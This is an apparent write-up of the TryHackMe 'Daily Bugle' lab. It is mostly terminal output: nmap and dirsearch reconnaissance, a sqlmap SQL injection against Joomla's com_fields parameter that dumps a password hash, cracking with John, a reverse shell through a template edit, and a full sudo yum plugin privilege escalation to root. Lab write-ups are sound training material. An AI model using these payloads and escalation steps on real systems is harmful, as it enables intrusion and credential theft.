THM-dailybugle

┌──(root㉿kali)-[/home/kali/tryhackme/dailybugle]
└─# cat 1.nmap 
# Nmap 7.95 scan initiated Tue Nov 18 21:22:40 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oA 1 10.10.125.50
Nmap scan report for 10.10.125.50
Host is up, received echo-reply ttl 63 (0.47s latency).
Scanned at 2025-11-18 21:22:41 UTC for 215s
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
| http-methods: 
|_  Supported Methods: HEAD
3306/tcp open  mysql   syn-ack ttl 63 MariaDB 10.3.23 or earlier (unauthorized)

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 18 21:26:16 2025 -- 1 IP address (1 host up) scanned in 215.91 seconds

┌──(root㉿kali)-[/home/kali/tryhackme/dailybugle]
└─# dirsearch -u http://10.10.31.26    
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                
 (_||| _) (/_(_|| (_| )                                                                                         
                                                                                                                
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/tryhackme/dailybugle/reports/http_10.10.31.26/_25-11-19_14-25-13.txt

Target: http://10.10.31.26/

[14:25:13] Starting:                                                                                            
[14:25:26] 403 -  213B  - /.ht_wsr.txt                                      
[14:25:26] 403 -  216B  - /.htaccess.bak1                                   
[14:25:26] 403 -  216B  - /.htaccess.save                                   
[14:25:26] 403 -  216B  - /.htaccess.orig
[14:25:26] 403 -  218B  - /.htaccess.sample
[14:25:26] 403 -  214B  - /.htaccessOLD                                     
[14:25:26] 403 -  207B  - /.html
[14:25:26] 403 -  215B  - /.htaccessOLD2                                    
[14:25:26] 403 -  217B  - /.htaccess_extra                                  
[14:25:26] 403 -  216B  - /.htaccess_orig                                   
[14:25:26] 403 -  214B  - /.htaccess_sc
[14:25:26] 403 -  214B  - /.htaccessBAK
[14:25:26] 403 -  206B  - /.htm
[14:25:26] 403 -  212B  - /.htpasswds                                       
[14:25:26] 403 -  216B  - /.htpasswd_test                                   
[14:25:26] 403 -  213B  - /.httr-oauth
[14:25:32] 403 -  211B  - /.user.ini                                        
[14:25:54] 200 -    2KB - /administrator/includes/                          
[14:25:54] 301 -  241B  - /administrator  ->  http://10.10.31.26/administrator/
[14:25:54] 200 -   31B  - /administrator/cache/                             
[14:25:54] 200 -    5KB - /administrator/index.php                          
[14:25:54] 200 -   31B  - /administrator/logs/                              
[14:25:54] 301 -  246B  - /administrator/logs  ->  http://10.10.31.26/administrator/logs/
[14:25:54] 200 -    5KB - /administrator/                                   
[14:26:03] 301 -  231B  - /bin  ->  http://10.10.31.26/bin/                 
[14:26:03] 200 -   31B  - /bin/                                             
[14:26:05] 200 -   31B  - /cache/                                           
[14:26:05] 301 -  233B  - /cache  ->  http://10.10.31.26/cache/             
[14:26:06] 403 -  210B  - /cgi-bin/                                         
[14:26:08] 200 -   31B  - /cli/                                             
[14:26:09] 301 -  238B  - /components  ->  http://10.10.31.26/components/   
[14:26:09] 200 -   31B  - /components/                                      
[14:26:10] 200 -    0B  - /configuration.php                                
[14:26:31] 200 -    3KB - /htaccess.txt                                     
[14:26:33] 301 -  234B  - /images  ->  http://10.10.31.26/images/           
[14:26:33] 200 -   31B  - /images/
[14:26:34] 301 -  236B  - /includes  ->  http://10.10.31.26/includes/       
[14:26:34] 200 -   31B  - /includes/                                        
[14:26:34] 404 -    3KB - /index.php/login/                                 
[14:26:35] 200 -    9KB - /index.php                                        
[14:26:38] 301 -  236B  - /language  ->  http://10.10.31.26/language/       
[14:26:38] 200 -   31B  - /layouts/                                         
[14:26:39] 301 -  237B  - /libraries  ->  http://10.10.31.26/libraries/     
[14:26:39] 200 -   31B  - /libraries/                                       
[14:26:39] 200 -   18KB - /LICENSE.txt                                      
[14:26:43] 301 -  233B  - /media  ->  http://10.10.31.26/media/             
[14:26:43] 200 -   31B  - /media/                                           
[14:26:45] 301 -  235B  - /modules  ->  http://10.10.31.26/modules/         
[14:26:46] 200 -   31B  - /modules/                                         
[14:26:55] 301 -  235B  - /plugins  ->  http://10.10.31.26/plugins/         
[14:26:55] 200 -   31B  - /plugins/
[14:27:00] 200 -    4KB - /README.txt                                       
[14:27:02] 200 -  836B  - /robots.txt                                       
[14:27:11] 301 -  237B  - /templates  ->  http://10.10.31.26/templates/     
[14:27:11] 200 -   31B  - /templates/
[14:27:12] 200 -   31B  - /templates/index.html                             
[14:27:12] 200 -    0B  - /templates/beez3/
[14:27:12] 200 -    0B  - /templates/system/                                
[14:27:12] 200 -    0B  - /templates/protostar/                             
[14:27:13] 301 -  231B  - /tmp  ->  http://10.10.31.26/tmp/                 
[14:27:13] 200 -   31B  - /tmp/                                             
[14:27:20] 200 -    2KB - /web.config.txt

i was looking for a specific amount of the servers present there .........

but this was not what i meant to get /./

┌──(root㉿kali)-[/home/kali/Downloads]
└─# sqlmap -u "http://10.80.152.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomla -T "#__users" -C username --dump
        ___
       __H__                                                                       
 ___ ___["]_____ ___ ___  {1.9.11#stable}                                          
|_ -| . [(]     | .'| . |                                                          
|___|_  [,]_|_|_|__,|  _|                                                          
      |_|V...       |_|   https://sqlmap.org                                       

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:02:59 /2025-11-19/

[21:02:59] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' from file '/usr/share/sqlmap/data/txt/user-agents.txt'           
[21:02:59] [INFO] resuming back-end DBMS 'mysql' 
[21:02:59] [INFO] testing connection to the target URL
[21:02:59] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('eaa83fe8b963ab08ce9ab7d4a798de05=fvmh7ss7ouq...psvsnek6s0'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT (ELT(6057=6057,1))),0x716a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 4539 FROM (SELECT(SLEEP(5)))ANmi)
---
[21:03:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.6.40
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[21:03:00] [INFO] fetching database names
[21:03:00] [INFO] resumed: 'information_schema'
[21:03:00] [INFO] resumed: 'joomla'
[21:03:00] [INFO] resumed: 'mysql'
[21:03:00] [INFO] resumed: 'performance_schema'
[21:03:00] [INFO] resumed: 'test'
available databases [5]:
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] test

[21:03:00] [INFO] fetching entries of column(s) 'username' for table '#__users' in database 'joomla'
[21:03:02] [INFO] retrieved: 'jonah'
Database: joomla
Table: #__users
[1 entry]
+----------+
| username |
+----------+
| jonah    |
+----------+

[21:03:02] [INFO] table 'joomla.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/10.80.152.101/dump/joomla/#__users.csv'                              
[21:03:02] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[21:03:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.80.152.101'                                                            

[*] ending @ 21:03:02 /2025-11-19/

then i tried for the password and i sucessfully got a hash ;)

┌──(root㉿kali)-[/home/kali/Downloads]
└─# sqlmap -u "http://10.80.152.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomla -T "#__users" -C password --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.11#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:04:28 /2025-11-19/

[21:04:28] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0' from file '/usr/share/sqlmap/data/txt/user-agents.txt'                                                                                            
[21:04:28] [INFO] resuming back-end DBMS 'mysql' 
[21:04:28] [INFO] testing connection to the target URL
[21:04:32] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('eaa83fe8b963ab08ce9ab7d4a798de05=5m80oa41a9e...4001f5lcb7'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT (ELT(6057=6057,1))),0x716a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 4539 FROM (SELECT(SLEEP(5)))ANmi)
---
[21:04:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: PHP 5.6.40, Apache 2.4.6
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[21:04:33] [INFO] fetching database names
[21:04:33] [INFO] resumed: 'information_schema'
[21:04:33] [INFO] resumed: 'joomla'
[21:04:33] [INFO] resumed: 'mysql'
[21:04:33] [INFO] resumed: 'performance_schema'
[21:04:33] [INFO] resumed: 'test'
available databases [5]:
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] test

[21:04:33] [INFO] fetching entries of column(s) 'password' for table '#__users' in database 'joomla'
[21:04:34] [INFO] retrieved: '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'
Database: joomla
Table: #__users
[1 entry]
+--------------------------------------------------------------+
| password                                                     |
+--------------------------------------------------------------+
| $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm |
+--------------------------------------------------------------+

[21:04:34] [INFO] table 'joomla.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/10.80.152.101/dump/joomla/#__users.csv'                                                                                        
[21:04:34] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 4 times
[21:04:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.80.152.101'

[*] ending @ 21:04:34 /2025-11-19/

┌──(root㉿kali)-[/home/kali/tryhackme/dailybugle] └─# echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash.txt

┌──(root㉿kali)-[/home/kali/tryhackme/dailybugle] └─# john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:03:33 0.11% (ETA: 2025-11-22 02:18) 0g/s 90.09p/s 90.09c/s 90.09C/s lolada..hafizah 0g 0:00:04:55 0.15% (ETA: 2025-11-22 02:06) 0g/s 90.75p/s 90.75c/s 90.75C/s puerta..mockingbird 0g 0:00:07:09 0.23% (ETA: 2025-11-22 01:01) 0g/s 92.83p/s 92.83c/s 92.83C/s sunshine...sexyrexy spiderman123 (?) 1g 0:00:08:21 DONE (2025-11-19 21:20) 0.001995g/s 93.45p/s 93.45c/s 93.45C/s thelma1..speciala Use the "--show" option to display all of the cracked passwords reliably Session completed.

┌──(root㉿kali)-[/home/kali/tryhackme/dailybugle] └─#

save the rev shell code and do change the lhost and lport and start the listen on the machine.......

just click on the template preview after saving it /././././././././.

boom got the shell

[jjameson@dailybugle tmp]$ TF=$(mktemp -d)
[jjameson@dailybugle tmp]$ cat > $TF/evil.conf << EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle tmp]$ 
[jjameson@dailybugle tmp]$ cat > $TF/evil_plugin.conf << EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle tmp]$ cat > $TF/evil_plugin.py << EOF
> import os
> os.system("/bin/bash")
> EOF
[jjameson@dailybugle tmp]$ sudo yum -c $TF/evil.conf update
[root@dailybugle tmp]# ls
evil.sh
evil.spec
systemd-private-4f7676c935a04cc681dc712ee1c8d866-chronyd.service-V8y4LG
systemd-private-4f7676c935a04cc681dc712ee1c8d866-httpd.service-NOiosH
systemd-private-4f7676c935a04cc681dc712ee1c8d866-mariadb.service-1n2v99
tmp.A1BW7hNcTv
tmp.eUjFw7uT4X
yum
[root@dailybugle tmp]# cd ..
[root@dailybugle /]# pwd
/
[root@dailybugle /]# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
[root@dailybugle /]# cd /root
[root@dailybugle ~]# ls
anaconda-ks.cfg  root.txt
[root@dailybugle ~]# cat root.txt
eec3d53292b1821868266858d7fa6f79
[root@dailybugle ~]#

PreviousEMPIRE Nextwindows

Last updated 4 months ago

Was this helpful?